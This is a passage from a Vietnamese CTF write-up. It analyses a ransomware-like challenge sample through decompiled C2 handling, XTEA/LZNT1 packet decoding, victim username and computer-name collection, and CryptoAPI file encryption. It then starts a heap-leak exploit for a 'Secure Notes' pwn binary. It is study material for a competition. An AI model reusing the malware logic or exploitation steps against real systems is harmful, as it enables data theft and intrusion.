  if ( *a2 != 'LZNT' )
    return 0;
  v6 = (int (__stdcall *)(int, int, _DWORD, _DWORD *, int, _DWORD **))(*a1)(934022636, 1259364965);
  v7 = v5 + 1;
  v8 = a5;
  if ( v6(2, a4, *a5, v7, a3 - 4, &a2) >= 0x8000000 )
    return 0;
  *v8 = a2;
  return 1;
}

Sau khi vào hàm xử lý, chương trình nhảy vào option default

Lần này trước khi gửi đi thì nó thực hiễn mã hõa LZNT1 trước như sau

Bên trong hàm mã hóa LZNT1 nó thực hiện gọi 2 hàm lần lượt là ntdll_RtlCompressBuffer và ntdll_RtlGetCompressionWorkSpaceSize


Tiếp đến nó lại mã hóa đống data vừa được mã hóa bằng LZNT1 bằng mã hóa XTEA rồi sau đó lại trả về kết quả cho ta

Gói tin thứ 5 sau khi được giải mã XTEA rồi đến giải mã LZNT1 thì có nội dụng như sau
Nội dụng sau khi được giải mã XTEA

Nội dụng sau khi được giải mã hoàn toàn giống với nội dụng của gói tin đầu tiên

Sau đó kết quả lại được mã hóa LZNT1 rồi đến mã hóa XTEA để gửi trả.
Gói tin thứ 6 có nội dung cũng không có gì lắm sau khi được giải mã

Ta sẽ bỏ qua nó luôn để đến với gói tin thứ 7 là đoạn shellcode dài nhất. Nhưng khi mình xem thử nó là gì sau khi giải mã XTEA rồi đến LZNT1 thì trông nó như sau

Trông có vẻ như nó vẫn còn 1 lớp mã hóa nữa thì mới có thể đọc được, để đọc được t cần phải trace xem nó được gọi lúc nào là được.
Tiếp theo xem trong hàm xử lý dữ liệu trả về xem nó có làm gì khác không

Lần này chương trình chạy vào option thứ 2, trong này nó vẫn sử dụng mã hóa LZNT1 rồi đến mã hóa XTEA để mã hóa rồi gửi trả.
Gói tin thứ 8 sau khi tất cả các shellcode đã được load, dù ta chưa biết gói tin shellcode thứ 3 nó là gì, thì gói tin này sẽ chứa request mà ta yêu cầu
Nội dung của gói những gói tin này sau khi giải mã xong mình lại không đọc được, không biết do sao, nhưng mình kệ cho nó chạy tiếp vào hàm response xem sao.
Lần này nó đã chạy vào option thứ 3

Ở trong này nó gọi 1 hàm mà mình không biết nó là hàm gì, nên mình đặt 1 breakpoint ở đây xem sao, mình thấy nó là 1 đoạn shellcode khá dài, nên mình nghĩ đây sẽ là code sau khi được giải mã ở gói shellcode thứ 3 mà nãy ta không đọc được
int __stdcall sub_B20000(int a1, int a2, _BYTE *a3, int a4)
{
  int result; // eax
  int v5; // esi
  int (__stdcall *v6)(int, int); // eax
  void (__stdcall *v7)(char *, int *); // eax
  int v8; // eax
  int (__stdcall *v9)(int, int); // eax
  void (__stdcall *v10)(char *, int *); // eax
  char v11; // [esp+4h] [ebp-108h] BYREF
  int v12; // [esp+5h] [ebp-107h]
  char v13[259]; // [esp+9h] [ebp-103h] BYREF

  if ( !*a3 )
  {
    v5 = a1;
    (*(void (__cdecl **)(char *, _DWORD, int))(a1 + 12))(&v11, 0, 261);
    v9 = *(int (__stdcall **)(int, int))v5;
    a1 = 256;
    v10 = (void (__stdcall *)(char *, int *))v9(249665980, 1071500813);
    if ( v10 )
      v10(v13, &a1);
    v12 = a2;
    v8 = a1 + 4;
    goto LABEL_11;
  }
  if ( *a3 == 1 )
  {
    v5 = a1;
    (*(void (__cdecl **)(char *, _DWORD, int))(a1 + 12))(&v11, 0, 261);
    v6 = *(int (__stdcall **)(int, int))v5;
    a1 = 256;
    v7 = (void (__stdcall *)(char *, int *))v6(483040486, 129557701);
    if ( v7 )
      v7(v13, &a1);
    v12 = a2;
    v8 = a1 + 5;
LABEL_11:
    v11 = 3;
    return (*(int (__stdcall **)(char *, int))(v5 + 4))(&v11, v8);
  }
  result = (unsigned __int8)*a3 - 2;
  if ( *a3 == 2 )
    return sub_B20280(a2, (int (__stdcall **)(int, int))a1, a3 + 1);
  return result;
}

Lúc này chương trình chạy vào luồng sau, thực hiện gọi hàm GetUserNameA để lấy đi tên người dùng, khi mình cho chạy qua thì nó trả ra đúng username của mình

Rồi chương trình lại tiếp tục mã hóa 2 lần rồi gửi phản hồi cho ta. Từ đây ta cũng biết được rằng là server yêu cầu gửi username của nạn nhân
Gói tin thứ9 cũng là 1 request như gói tin thứ 8 không biết lần này nó sẽ yêu cầu gì , data sau khi được giải mã vẫn không đọc được

Sau đó chương trình lại chạy vào hàm này

Lần này chương trình thực hiện gọi hàm GetComputerNameA, rồi cũng tương tự như mọi lần, mã hóa 2 lần rồi gửi trả cho ta. Ở đây ta cũng biết được rằng server yêu cầu tên máy của nạn nhân

Gói tin cuối cùng

Lần này sau khi giải mã thì nó chứa 1 chuỗi gì đó có thể là dùng cho việc mã hóa

Lần này nó chạy vào 1 hàm mới bên trong hàm có 2 hàm GetName
int __usercall sub_B20280@(int a1@, int (__stdcall **a2)(int, int)@, char *a3)
{
  int (__stdcall **v3)(int, int); // ebx
  int (__stdcall *v4)(int, int); // eax
  void (__stdcall *v5)(_BYTE *, int *); // eax
  int (__stdcall *v6)(int, int); // ecx
  void (__stdcall *v7)(_BYTE *, int *); // eax
  int (__stdcall *v8)(int, int); // ecx
  int (__stdcall *v9)(int, int, _DWORD, _DWORD, int *, int); // eax
  int (__stdcall *v10)(int, int); // ecx
  int (__stdcall *v11)(int, int, _DWORD, _DWORD, int *, int); // edi
  int (__stdcall *v12)(int, _DWORD, int, _DWORD, _DWORD, int *); // eax
  int (__stdcall *v13)(int, int); // ecx
  int v14; // eax
  int (__stdcall *v15)(int, int); // ecx
  void (__stdcall *v16)(int); // esi
  int (__stdcall *v17)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // eax
  int (__stdcall *v18)(int, int); // ecx
  int (__stdcall *v19)(int, _DWORD); // eax
  int (__stdcall *v20)(int, int); // ecx
  void (__stdcall *v21)(_DWORD); // ecx
  char v22; // al
  int v24; // eax
  int v25; // ebx
  int (__stdcall *v26)(int, _DWORD, int, _DWORD, _DWORD, int *); // eax
  int v27; // esi
  char v28; // cl
  char *v29; // edi
  _BYTE *v30; // esi
  _BYTE *v31; // esi
  int v32; // eax
  int (__stdcall **v33)(int, int); // esi
  bool v34; // al
  int (__stdcall *v35)(int, int); // ecx
  int (__stdcall *v36)(int, int); // eax
  char v38; // [esp+Ch] [ebp-3Ch] BYREF
  int v39; // [esp+Dh] [ebp-3Bh]
  char v40; // [esp+11h] [ebp-37h]
  int v41; // [esp+14h] [ebp-34h]
  void (__stdcall *v42)(int); // [esp+18h] [ebp-30h]
  void (__stdcall *v43)(_DWORD); // [esp+1Ch] [ebp-2Ch]
  int (__stdcall *v44)(int, int, _DWORD, _DWORD, int *, int); // [esp+20h] [ebp-28h]
  void (__stdcall *v45)(_BYTE *, int *); // [esp+24h] [ebp-24h]
  void (__stdcall *v46)(_BYTE *, int *); // [esp+28h] [ebp-20h]
  int (__stdcall *v47)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // [esp+2Ch] [ebp-1Ch]
  int (__stdcall *v48)(int, _DWORD, int, _DWORD, _DWORD, int *); // [esp+30h] [ebp-18h]
  int (__stdcall *v49)(int, _DWORD); // [esp+34h] [ebp-14h]
  int v50; // [esp+38h] [ebp-10h] BYREF
  int v51; // [esp+3Ch] [ebp-Ch] BYREF
  int (__stdcall **v52)(int, int); // [esp+40h] [ebp-8h]
  bool v53; // [esp+47h] [ebp-1h]
  int v54; // [esp+50h] [ebp+8h]

  v3 = a2;
  v41 = a1;
  v4 = *a2;
  v52 = a2;
  v50 = 6516325;
  v5 = (void (__stdcall *)(_BYTE *, int *))v4(483040486, 129557701);
  v6 = *v3;
  v46 = v5;
  v7 = (void (__stdcall *)(_BYTE *, int *))v6(249665980, 1071500813);
  v8 = *v3;
  v45 = v7;
  v9 = (int (__stdcall *)(int, int, _DWORD, _DWORD, int *, int))v8(483040486, 1470354217);
  v10 = *v3;
  v11 = v9;
  v44 = v9;
  v12 = (int (__stdcall *)(int, _DWORD, int, _DWORD, _DWORD, int *))v10(483040486, 1461157287);
  v13 = *v3;
  v48 = v12;
  v14 = v13(483040486, 110641196);
  v15 = *v3;
  v16 = (void (__stdcall *)(int))v14;
  v42 = (void (__stdcall *)(int))v14;
  v17 = (int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD))v15(483040486, 1251858184);
  v18 = *v3;
  v47 = v17;
  v19 = (int (__stdcall *)(int, _DWORD))v18(483040486, 1266602787);
  v20 = *v3;
  v49 = v19;
  v21 = (void (__stdcall *)(_DWORD))v20(483040486, (int)&unk_3875CFF);
  v22 = 0;
  v43 = v21;
  v53 = 0;
  if ( v46 && v45 && v11 && v48 && v16 && v47 && v49 && v21 )
  {
    v24 = ((int (__stdcall *)(char *, int, _DWORD, _DWORD, int, int, _DWORD))v44)(a3 + 50, -1073741824, 0, 0, 4, 128, 0);
    v25 = v24;
    if ( v24 != -1 )
    {
      v44 = (int (__stdcall *)(int, int, _DWORD, _DWORD, int *, int))v49(v24, 0);
      v26 = (int (__stdcall *)(int, _DWORD, int, _DWORD, _DWORD, int *))v48(v25, 0, 4, 0, 0, &v50);
      v48 = v26;
      if ( v26 )
      {
        v47 = (int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD))v47(v26, 983071, 0, 0, 0);
        if ( v47 )
        {
          v27 = ((int (__cdecl *)(int))v52[5])(256);
          v54 = v27;
          ((void (__cdecl *)(int, _DWORD, int))v52[3])(v27, 0, 256);
          v28 = *a3;
          if ( *a3 )
          {
            v29 = &a3[-v27];
            do
            {
              *(_BYTE *)v27++ = v28;
              v28 = v29[v27];
            }
            while ( v28 );
          }
          *(_BYTE *)v27 = 95;
          v30 = (_BYTE *)(v27 + 1);
          v51 = 100;
          v46(v30, &v51);
          for ( ; *v30; ++v30 )
            ;
          *v30 = 95;
          v31 = v30 + 1;
          v51 = 100;
          v45(v31, &v51);
          v32 = (int)&v31[v51 - v54];
          v33 = v52;
          v51 = v32;
          v34 = sub_B20100((int)v47, v52, v44, v54, v32);
          v35 = v33[6];
          v53 = v34;
          ((void (__cdecl *)(int))v35)(v54);
          v43(v47);
          v16 = v42;
        }
        v16(v25);
        v16((int)v48);
      }
      else
      {
        v16(v25);
      }
    }
    v22 = v53;
    v3 = v52;
  }
  v40 = v22;
  v36 = v3[1];
  v38 = 3;
  v39 = v41;
  return v36((int)&v38, 6);
}

Sau khi gọi 1 loạt các hàm liên quan đến file, chương trình thực hiện ghép chuỗi encrypted_by_pepega với CompName + UserName thành như sau

Lúc đầu mình tưởng key sẽ là encrypted_by_pepega_DESKTOP-R867K5S_hansha29 nhưng khi thấy chương trình load độ dài của key vào để mã hóa, lại load độ dài vào là 45 chứ không phải 44, nên mình kết luận rằng key sẽ phải là encrypted_by_pepega_DESKTOP-R867K5S_hansha29\x00. Đồng thời nó cũng đọc file important_note.txt, chắc là để mã hóa xong ghi đè vào luôn
Sau khi set các giá trị xong thì nó nhảy vào 1 hàm cuối cùng trông như hàm mã hóa, sau khi debug qua 1 lần mình sửa lại các tên biến là như sau
bool __usercall sub_B20100@(
        int a1@,
        int (__stdcall **a2)(int, int)@,
        int (__stdcall *a3)(int, int, _DWORD, _DWORD, int *, int),
        int a4,
        int a5)
{
  int (__stdcall *v6)(int *, _DWORD, _DWORD, int, int); // eax
  int (__stdcall *v7)(int, int); // edx
  int (__stdcall *v8)(int, int, _DWORD, _DWORD, int *, int); // eax
  int (__stdcall *v9)(int, int); // ecx
  void (__stdcall *v10)(int); // edi
  int (__stdcall *v11)(int, int, int); // eax
  int (__stdcall *v12)(int, int); // ecx
  void (__stdcall *v13)(int); // ebx
  int (__stdcall *v14)(int, int, int, int, int *); // eax
  int (__stdcall *v15)(int, int); // ecx
  void (__stdcall *v16)(int); // eax
  int (__stdcall *v17)(int, int); // ecx
  int v18; // eax
  bool v20; // bl
  int v21; // [esp+0h] [ebp-38h]
  void (__stdcall *v22)(int); // [esp+Ch] [ebp-2Ch]
  int (__stdcall *v23)(int, _DWORD, int, _DWORD, int, int (__stdcall **)(int, int, _DWORD, _DWORD, int *, int), int (__stdcall *)(int, int, _DWORD, _DWORD, int *, int)); // [esp+10h] [ebp-28h]
  int (__stdcall *v25)(int, int, _DWORD, _DWORD, int *, int); // [esp+18h] [ebp-20h] BYREF
  int (__stdcall *v26)(int *, _DWORD, _DWORD, int, int); // [esp+1Ch] [ebp-1Ch]
  void (__stdcall *v27)(int); // [esp+20h] [ebp-18h]
  int (__stdcall *v28)(int, int, int, int, int *); // [esp+24h] [ebp-14h]
  int (__stdcall *v29)(int, int, int); // [esp+28h] [ebp-10h]
  int v30; // [esp+2Ch] [ebp-Ch] BYREF
  int v31; // [esp+30h] [ebp-8h] BYREF
  int v32; // [esp+34h] [ebp-4h] BYREF

  CryptAcquireContextA = (int (__stdcall *)(int *, _DWORD, _DWORD, int, int))(*a2)(249665980, 1858846290);
  v7 = *a2;
  CryptAcquireContextA_ = CryptAcquireContextA;
  CryptCreateHash = (int (__stdcall *)(int, int, _DWORD, _DWORD, int *, int))v7(249665980, 1573185900);
  v9 = *a2;
  CryptCreateHash_ = CryptCreateHash;
  CryptReleaseContext = (void (__stdcall *)(int))v9(249665980, 1229890258);
  CryptHashData = (int (__stdcall *)(int, int, int))(*a2)(0xEE199BC, 0x7815B132);
  v12 = *a2;
  CryptHashData_ = CryptHashData;
  CryptDestroyHash = (void (__stdcall *)(int))v12(0xEE199BC, 0x1EB84116);
  CryptDestroyHash_ = CryptDestroyHash;
  CryptDeriveKey = (int (__stdcall *)(int, int, int, int, int *))(*a2)(0xEE199BC, 0x21695E2A);
  v15 = *a2;
  CryptDeriveKey_ = CryptDeriveKey;
  CryptDestroyKey = (void (__stdcall *)(int))v15(0xEE199BC, 0x1B98AC67);
  v17 = *a2;
  CryptDestroyKey_ = CryptDestroyKey;
  CryptEncrypt = v17(0xEE199BC, 0x2B75EDEF);
  CryptEncrypt_ = (int (__stdcall *)(int, _DWORD, int, _DWORD, int, int (__stdcall **)(int, int, _DWORD, _DWORD, int *, int), int (__stdcall *)(int, int, _DWORD, _DWORD, int *, int)))CryptEncrypt;
  v32 = 0;
  v31 = 0;
  v30 = 0;
  if ( !CryptAcquireContextA_
    || !CryptCreateHash_
    || !CryptReleaseContext
    || !CryptHashData_
    || !CryptDestroyHash
    || !CryptDeriveKey_
    || !CryptDestroyKey_
    || !CryptEncrypt
    || !CryptAcquireContextA_(&v32, 0, 0, 24, -268435456) )
  {
    return 0;
  }
  if ( !CryptCreateHash_(v32, 0x800C, 0, 0, &v31, v21) )
  {
LABEL_13:
    CryptReleaseContext(v32);
    return 0;
  }
  if ( !CryptHashData_(v31, a4, a5) || !CryptDeriveKey_(v32, 0x6801, v31, 0x580011, &v30) )
  {
    ((void (__stdcall *)(int, _DWORD))CryptDestroyHash)(v31, 0);
    goto LABEL_13;
  }
  CryptCreateHash_ = a3;
  v20 = CryptEncrypt_(v30, 0, 1, 0, a1, &CryptCreateHash_, a3) != 0;
  CryptDestroyKey_(v30);
  CryptDestroyHash_(v31);
  ((void (__stdcall *)(int, _DWORD))CryptReleaseContext)(v32, 0);
  return v20;
}

Sau khi chạy qua hàm CryptEncrypt_(v30, 0, 1, 0, a1, &CryptCreateHash_, a3), thì 1 loạt data mới đã được khi đè vào file important_note.txt

Sau khi phân thích hết các gói tin, mình kết luận rằng ta cần phải tìm được tên người dùng của nạn nhân và tên máy tính của nạn nhân. Vì các gói tin phản hồi đã được mã hóa, nên việc ta cần làm là giải mã nó xem có sử dụng được gì không nhưng mình thu gọn được phạm vi kiểm tra xuống chỉ còn 3 gói tin cuối, vì các gói tin bên trên thường chỉ là phản hồi của lib hoặc shell, chứ không phải resquest. Giờ ta có 2 hướng để làm, 1 là code mô phỏng lại thuật toán giải mã của chương trình. Nhưng với thằng code gà như mình thì mình sẽ tìm trick. Mình nảy ra ý tưởng là sao không gửi đống data được trả về để cho chương trình decode cho mình luôn nhỉ=)))))). Và đây là thành quả mình thu được

Từ đây mình có thể đoán được rằng tên người dùng là johndoe. Tương tự như vậy, mình cũng tìm ra được tên máy là DESKTOP-O6RCQQC. Qua đó ta có key là encrypted_by_pepega_DESKTOP-O6RCQQC_johndoe\x00. Patch key vào, set lại len cho chuẩn và cho chạy qua hàm encrypt là xong. Kết quả


Pwnable
pwn02: CoolPool
WriteUp chi tiếtcredit: ajomix
pwn03-flag1: Secure Notes
credit: Naox13
Trong file zip của challenge có 2 binary là interface và backend
Đọc file start.sh để biết chương trình chạy như thế nào

Chạy interface với argument là backend

Option 1
void add_new_note()
{
    char title[32];
    char author[32];
    char buf[64];
    char passwd_hash[SHA256_DIGEST_LENGTH];
    int is_encrypt;
    uint32_t content_len;

    if(notes_size > MAX_NOTE){
        printf("Unable to add new note\n");
        return;
    }

    printf("Title: ");
    read_line(title, sizeof(title) - 1);
    printf("Author: ");
    read_line(author, sizeof(author) - 1);

    do{
        printf("Wanna encrypt this notes? (y/n) ");
        read_line(buf, sizeof(buf));
    }while(buf[0] != 'y' && buf[0] != 'n');

    is_encrypt = buf[0] == 'y' ? 1 : 0;

    Note_t new_note = Note_init(title, author, 0, is_encrypt);
    if(is_encrypt){
        printf("What is your passwd? ");
        bzero(buf, sizeof(buf));

        read_line(buf, sizeof(buf) - 1);
        SHA256((const unsigned char *)buf, strlen(buf), (unsigned char *)passwd_hash);
    }

    printf("How many bytes for content? ");
    content_len = read_int();
    if(content_len > MAX_CONTENT_LEN){
        content_len = MAX_CONTENT_LEN;
    }

    printf("Content: \n");
    new_note->note_content = malloc(content_len);
    new_note->note_content_len = content_len;
    fgets(new_note->note_content, content_len, stdin);

    if(is_encrypt){
        // sync this note to backend
        size_t send_size = sizeof(struct msg_hdr) + sizeof(struct NoteSerialize) + sizeof(passwd_hash) + content_len;
        msg_hdr_t send_msg = malloc(send_size);
        send_msg->action = COMMIT;
        send_msg->msg_size = send_size - sizeof(struct msg_hdr);
        NoteSerialize_t serialize_p = (NoteSerialize_t)send_msg->msg_content;
        memcpy(&(serialize_p->common), &(new_note->common), sizeof(struct NoteCommon));
        serialize_p->note_content_len = sizeof(passwd_hash) + content_len;
        memcpy(serialize_p->content, passwd_hash, sizeof(passwd_hash));
        memcpy(&(serialize_p->content[sizeof(passwd_hash)]), new_note->note_content, new_note->note_content_len);

        send_data(&ipc, RECEIVER, send_msg, send_size);
        free(send_msg);

        uint64_t status = 0;
        int rc = recv_data_timeout(&ipc, SENDER, NULL, (uint64_t *)&status, 60);

        if(IS_ERR(rc) || status != OK){
            printf("Unable to sync this note to server :(, destroying this note\n");
            Note_destroy(new_note);
            return;
        }

        free(new_note->note_content);
        new_note->note_content = NULL;
        new_note->note_synced = 1;
    }

    DL_APPEND(notes, new_note);
    notes_size++;
    puts("Added");
}

Khởi tạo1 note. Nếu như chọn option encrypt thì hàm này sẽ tạo 1 key bằng cách lấy hash SHA256 của password mình nhập vào rồi gửi cho backend để backend mã hóa, còn không thì sẽ chỉ tạo note đó trên interface
1 số structs mà interface sử dụng
struct Note {
    struct NoteCommon common;
    char *note_content;
    struct Note *prev;
    struct Note *next;
};
struct NoteSerialize {
    struct NoteCommon common;
    char content[];
};
struct NoteCommon {
    char title[MAX_LEN];
    char author[32];
    uint32_t content_len;
    uint32_t flags;
    uint32_t encrypt:1;
    uint32_t synced:1; // unsed in backend
};
typedef enum Action {
    NONE = 0,
    COMMIT = 1,
    FETCH = 2,
    DELETE = 3,
    AUTH = 4,
    TRUNCATED = 5 // use for reply_msg is larger than SHM_MEM_MAX_SIZE
} Action;

struct msg_hdr {
    Action action;
    uint32_t msg_size;
    char msg_content[];
};

Option 2:
void list_note()
{
    Note_t tnote;
    DL_FOREACH(notes, tnote){
        printf("Title: %s\n", tnote->note_title);
        printf("Author: %s\n", tnote->note_author);
        if(tnote->note_is_encrypt){
            printf("Content: (Encrypted)\n");
        } else {
            printf("Content: %s\n", tnote->note_content);
        }
    }
}

Đơn giản là in ra content của các note(nếu không được mã hóa)
Option 3:
void read_note()
{
    struct Note s_note;
    Note_t tmp;
    char buf[64];
    char passwd_hash[SHA256_DIGEST_LENGTH];
    msg_hdr_t send_msg;
    msg_hdr_t recv_msg;
    size_t recv_size = 0;
    size_t send_size = 0;
    NoteSerialize_t serialize_p;
    Status status;
    int rc;

    bzero(&s_note, sizeof(struct Note));
    printf("Title: ");
    read_line(s_note.note_title, sizeof(s_note.note_title) - 1);
    printf("Author: ");
    read_line(s_note.note_author, sizeof(s_note.note_author) - 1);

    DL_SEARCH(notes, tmp, &s_note, Note_cmp);
    if(!tmp){
        printf("Unable to find your note\n");
        return;
    }

    if(tmp->note_is_encrypt){
        printf("Password? ");
        read_line(buf, sizeof(buf) - 1);
        // sha1 here
        SHA256((const unsigned char *)buf, strlen(buf), (unsigned char *)passwd_hash);

        // read from backend
        send_size = sizeof(struct msg_hdr) + sizeof(struct NoteSerialize) + SHA256_DIGEST_LENGTH;
        send_msg = malloc(send_size);
        send_msg->action = FETCH;
        send_msg->msg_size = send_size - sizeof(struct msg_hdr);
        serialize_p = (NoteSerialize_t)send_msg->msg_content;

        memcpy(&(serialize_p->common), &(tmp->common), sizeof(struct NoteCommon));
        memcpy(serialize_p->content, passwd_hash, sizeof(passwd_hash));

        send_data(&ipc, RECEIVER, send_msg, send_size);
        free(send_msg);

        rc = recv_data_timeout(&ipc, SENDER, (void **)&recv_msg, &recv_size, 60);
        if(IS_ERR(rc) || recv_size < sizeof(struct msg_hdr)){
            printf("Unable to read content\n");
            return;
        }

        serialize_p = (NoteSerialize_t)recv_msg->msg_content;
        printf("Content: %s\n", serialize_p->content);

    } else {
        printf("Content: %s\n", tmp->note_content);
    }
}

Chọn 1 note để in ra content. Nếu note được mã hóa thì sẽ lấy content trên backend bằng cách đưa cho password để chương trình tạo key và thông qua xác thực thì mới lấy được nội dung của note. Còn nếu không bị encrypt thì lấy luôn content của note trên interface
Option 4:
void edit_note()
{
    struct Note s_note;
    Note_t tmp;
    char buf[64];
    char passwd_hash[SHA256_DIGEST_LENGTH];
    msg_hdr_t send_msg;
    size_t send_size = 0;
    NoteSerialize_t serialize_p;
    uint64_t status;
    int rc;

    bzero(&s_note, sizeof(struct Note));
    printf("Title: ");
    read_line(s_note.note_title, sizeof(s_note.note_title) - 1);
    printf("Author: ");
    read_line(s_note.note_author, sizeof(s_note.note_author) - 1);

    DL_SEARCH(notes, tmp, &s_note, Note_cmp);
    if(!tmp){
        printf("Unable to find your note\n");
        return;
    }

    if(tmp->note_is_encrypt){
        printf("Password ?");
        read_line(buf, sizeof(buf) - 1);
        // sha256
        SHA256((const unsigned char *)buf, strlen(buf), (unsigned char *)passwd_hash);

        // sync with server
        send_size = sizeof(struct msg_hdr) + sizeof(struct NoteSerialize) + sizeof(passwd_hash);
        send_msg = malloc(send_size);
        send_msg->action = AUTH;
        send_msg->msg_size = send_size - sizeof(struct msg_hdr);
        serialize_p = (NoteSerialize_t)send_msg->msg_content;
        memcpy(&(serialize_p->common), &(tmp->common), sizeof(struct NoteCommon));
        serialize_p->note_content_len = sizeof(passwd_hash);
        memcpy(serialize_p->content, passwd_hash, sizeof(passwd_hash));

        send_data(&ipc, RECEIVER, send_msg, send_size);
        free(send_msg);

        rc = recv_data_timeout(&ipc, SENDER, NULL, &status, 60);
        if(IS_ERR(rc) || status != OK){
            printf("Authenticate was failed\n");
            return;
        }
        printf("Access granted\n");
    }

    printf("New content len?");
    uint32_t content_len = read_int();
    content_len = content_len < MAX_CONTENT_LEN ? content_len: MAX_CONTENT_LEN;

    printf("New content:\n");
    if(tmp->note_is_encrypt){
        tmp->note_content = malloc(content_len);
        tmp->note_content_len = content_len;
        fgets(tmp->note_content, content_len, stdin);
        // sync with server
        send_size = sizeof(struct msg_hdr) + sizeof(struct NoteSerialize) + sizeof(passwd_hash) + content_len;
        send_msg = malloc(send_size);
        send_msg->action = COMMIT;
        send_msg->msg_size = send_size - sizeof(struct msg_hdr);
        serialize_p = (NoteSerialize_t)send_msg->msg_content;
        memcpy(&(serialize_p->common), &(tmp->common), sizeof(struct NoteCommon));

        serialize_p->note_content_len += sizeof(passwd_hash);
        memcpy(serialize_p->content, passwd_hash, sizeof(passwd_hash));
        memcpy(serialize_p->content + sizeof(passwd_hash), tmp->note_content, tmp->note_content_len);

        free(tmp->note_content);
        tmp->note_content = NULL;

        send_data(&ipc, RECEIVER, send_msg, send_size);
        free(send_msg);

        rc = recv_data_timeout(&ipc, SENDER, NULL, (uint64_t *)&status, 60);
        if(IS_ERR(rc) || status != OK){
            printf("Unable to update your content\n");
            return;
        }
        tmp->note_synced = 1;
    } else {
        if(tmp->note_content){
            free(tmp->note_content);
        }
        tmp->note_content = malloc(content_len);
        tmp->note_content_len = content_len;
        fgets(tmp->note_content, content_len, stdin);
        tmp->note_synced = 0;
    }
}

Chọn 1 note để thay đổi content. Nếu được mã hóa thì sẽ phải qua bước xác thực tới backend còn không thì sẽ chỉ thay đổi content trên interface
Cuối cùng là hàm note_sync ở option 6
int note_sync(int flag)
{
    msg_hdr_t msg_hdr = NULL;
    uint32_t send_size, recv_size;
    struct msg_hdr inline_msg_hdr;
    Note_t cur_note, next_note, next_note2;
    NoteSerialize_t serialize_p;
    uint64_t status;
    uint32_t read_count = 0;
    int rc;

    if(flag == 1){
        send_size = sizeof(struct msg_hdr);

        next_note = notes;
        next_note2 = notes;

        // commit un-synced note to backend
        DL_FOREACH(next_note, cur_note){
            if(cur_note->note_synced)
                continue;
            send_size += sizeof(struct NoteSerialize) + cur_note->note_content_len;
            if(send_size > SHM_MEM_MAX_SIZE){
                next_note = cur_note;
                break;
            }
        }

        if(send_size == sizeof(struct msg_hdr)){
            printf("All notes was synced\n");
            return 0;
        }

        msg_hdr = malloc(send_size);
        msg_hdr->action = COMMIT;
        msg_hdr->msg_size = send_size - sizeof(struct msg_hdr);
        serialize_p = (NoteSerialize_t)msg_hdr->msg_content;

        DL_FOREACH(next_note2, cur_note) {
            if(cur_note->note_synced)
                continue;
            memcpy(&(serialize_p->common), &(cur_note->common), sizeof(struct NoteCommon));
            memcpy(serialize_p->content, cur_note->note_content, cur_note->note_content_len);
            serialize_p = (NoteSerialize_t)((size_t)serialize_p + sizeof(struct NoteSerialize) + cur_note->note_content_len);
            cur_note->note_synced = 1;
        }

        send_data(&ipc, RECEIVER, msg_hdr, send_size);
        free(msg_hdr);

        rc = recv_data_timeout(&ipc, SENDER, NULL, (uint64_t *)&status, 60);
        if(IS_ERR(rc) || status != OK){
            printf("Unable to commit data to backend\n");
            return 1;
        }

    } else {
        // fetch from backend
        inline_msg_hdr.action = FETCH;
        inline_msg_hdr.msg_size = 0xFFFFFFFF; // fetch all except encrypted note content
        send_data(&ipc, RECEIVER, &inline_msg_hdr, sizeof(inline_msg_hdr));

        int truncated = 0;
        do{
            truncated = 0;
            rc = recv_data_timeout(&ipc, SENDER, (void **)&msg_hdr, (uint64_t *)&recv_size, 60);
            if(IS_ERR(rc) || recv_size < sizeof(struct msg_hdr)){
                if((Status)recv_size == OK){
                    return 0;
                } else {
                    printf("Unable to fetch data from backend\n");
                    return 1;
                }
            }

            if(msg_hdr->action == TRUNCATED)
                truncated = 1;

            Note_t search_note;
            // parse from backend
            while(read_count < msg_hdr->msg_size){
                serialize_p = (NoteSerialize_t)((size_t)msg_hdr->msg_content + read_count);
                Note_t new_note = Note_init(serialize_p->note_title,
                                            serialize_p->note_author,
                                            serialize_p->note_content_len,
                                            serialize_p->note_is_encrypt);

                read_count += sizeof(struct NoteSerialize);
                Note_t p_note;
                DL_SEARCH(notes, search_note, new_note, Note_cmp);
                p_note = search_note;
                if(!search_note){
                    p_note = new_note;
                }

                // update new content
                if(!p_note->note_is_encrypt){
                    memcpy(p_note->note_content, serialize_p->content, serialize_p->note_content_len);
                    read_count += new_note->note_content_len;
                }

                if(p_note->note_is_encrypt) {
                    p_note->note_synced = 1;
                    if(p_note->note_content){
                        free(p_note->note_content);
                        p_note->note_content = NULL;
                    }
                }

                if(!search_note){
                    DL_APPEND(notes, new_note);
                } else {
                    Note_destroy(new_note);
                }
            }

            if(truncated){
                // signal backend send next data
                send_data(&ipc, RECEIVER, NULL, OK);
            }
        } while(truncated);
    }
    return 0;
}

Sẽ có 2 option đó là c hoặc s. c tức là COMMIT tất cả các note của interface lên backend, s là cập nhật tất cả note của backend về interface
Tìm Bug
Ở hàm edit_note
if(tmp->note_content){
    free(tmp->note_content);
}
tmp->note_content = malloc(content_len);
tmp->note_content_len = content_len;
fgets(tmp->note_content, content_len, stdin);
tmp->note_synced = 0;

Khi malloc thì chương trình không khởi tạo giá trị ban đầu nên vẫn còn sót lại trên heap nên có thể leak dc
Edit note với cùng 1 size thì khi malloc nó sẽ nhận lại chunk vừa free
Chunk khi vừa được free

Sau hàm fgets

Như vậy là có thể leak được heap
new_note(b'a', b'a', 1, b'a')
edit_note(b'a', b'a', 1, b'a')

Tương tự ta tạo 1 note với content lớn để có unsorted bin để leak libc. Cần phải tạo thêm 1 note khác để chương trình malloc1 chunk ở sau khi free chunk lớn thành unsorted bin sẽ không bị nhập vào top chunk
edit_note(b'a', b'a', 0x500, b'a')
new_note(b'b', b'b', 1, b'b')
edit_note(b'a', b'a', 1, b'a')

Như vậy là giờ mình đã có heap và libc
Bug tiếp theo nằm ở hàm note_sync khi lấy data từ backend về interface
Note_t search_note;
// parse from backend
while(read_count < msg_hdr->msg_size){
    serialize_p = (NoteSerialize_t)((size_t)msg_hdr->msg_content + read_count);
    Note_t new_note = Note_init(serialize_p->note_title,
                                serialize_p->note_author,
                                serialize_p->note_content_len,
                                serialize_p->note_is_encrypt);

    read_count += sizeof(struct NoteSerialize);
    Note_t p_note;
    DL_SEARCH(notes, search_note, new_note, Note_cmp);
    p_note = search_note;
    if(!search_note){
        p_note = new_note;
    }

    // update new content
